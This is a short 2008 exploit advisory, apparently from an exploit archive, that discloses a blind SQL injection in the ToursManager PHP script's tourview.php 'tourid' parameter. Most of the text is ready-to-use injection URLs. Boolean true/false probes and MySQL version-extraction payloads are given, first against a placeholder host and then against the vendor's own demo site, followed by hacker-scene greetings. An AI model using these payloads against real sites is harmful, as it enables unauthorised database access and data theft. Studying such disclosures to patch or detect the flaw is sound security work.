[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ToursManager (tourview.php tourid) Blind SQL Injection Vulnerability
# Published : 2008-11-20
# Author : XaDoS
# Previous Title : Natterchat 1.12 (Auth Bypass) Remote SQL Injection Vulnerability
# Next Title : NatterChat 1.1 Remote Admin Bypass Vulnerability


[>] Name:-->             ToursManager PhP Script <= Blind Sql Injection
 
[>] Discovered by:-->  XaDoS
 
[>] ContacT m&:-->     xados[at]hotmail.it
 
[>] Site:-->                http://www.toursmanager.com
 
#########
 
[a–?] ?£XpLoIT:
 
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=1--   (true)
 
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=0--   (false)
 
Version:
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5  (true)
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4  (false)
 
V=> 5.x.x XD
 
#########
[a–?] D&M0:
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5 
 
#########
 
[a–?] Th4Nks T0:
 
> Boom3rang </ (very kind) ;-)
> Langy  </
> Str0ke </
 
#########

# www.Syue.com [2008-11-20]